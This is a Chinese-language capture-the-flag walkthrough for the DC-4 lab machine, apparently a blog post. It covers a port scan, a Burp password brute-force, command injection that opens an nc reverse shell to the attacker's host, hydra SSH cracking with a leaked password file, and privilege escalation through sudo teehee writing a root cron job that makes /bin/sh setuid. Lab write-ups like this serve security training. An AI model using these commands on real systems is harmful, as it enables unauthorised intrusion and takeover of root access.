【DC】DC-4
阿新 • • 發佈:2022-04-04
kali:192.168.223.131
target:192.168.223.158
首先確定目標IP為192.168.223.158
arp-scan -l
nmap掃描開放埠,發現開啟22和80埠
nmap -T4 -A 192.168.223.158 -p 1-65535
進入網站是一個登入框,通過網站提示使用者名稱是admin
burp爆破獲得賬號密碼是happy
進入後是一個檔案管理,通過點選選項傳送命令執行的執行
抓包後發現是通過傳送命令執行進行管理
放到repeater後進行測試,發現是一個命令執行漏洞,同時+代替空格
使用nc進行連線,對方上線,同時美化介面
//target
nc+192.168.223.131+4444+-e+/bin/bash
//kali
nc -lvnp 4444
python -c "import pty;pty.spawn('/bin/bash')"
在home目錄檢視有哪些使用者,並挨個看一下,發現home目錄下的jim使用者的backups目錄下有一個old-passwords.bak檔案,裡面都是密碼,將其複製下來儲存為字典
使用hydra進行破解,獲得賬號密碼為jim和jibril04
hydra -l jim -P password.txt -t 5 ssh://192.168.223.158 ssh [email protected]
登陸進來發現有個mail,看一下郵箱,裡面有一封信,是charles說自己要出去,給了他密碼是^xHhA&hvim0y
cd /var/mail
cat jim
通過su提權進入charles賬戶,檢視可以使用的命令
su charles
sudo -l
teehee可以配合計劃任務使用,此時退出後等一分鐘就可以看到ls -la /bin/sh
都可讀可寫可執行
//echo root chmod 4777 /bin/sh > /etc/crontab沒許可權
sudo teehee /etc/crontab
* * * * * root chmod 4777 /bin/sh
切換到/bin/sh
就獲得root許可權,拿到flag